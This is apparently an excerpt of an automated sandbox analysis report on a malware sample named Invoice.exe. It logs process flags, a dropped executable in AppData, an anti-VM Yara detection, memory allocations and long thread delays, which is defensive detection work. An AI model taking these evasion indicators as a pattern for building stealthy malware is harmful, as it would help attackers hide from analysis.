Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Invoice.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: HbxYXheklrhvR.exe PID: 7588, type: MEMORYSTR

Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 2A70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 1000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 6060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 7060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 71A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Memory allocated: 81A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 1250000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 2E20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 13B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 62E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 72E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 7420000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Memory allocated: 8420000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597285	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597032	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595178	Jump to behavior
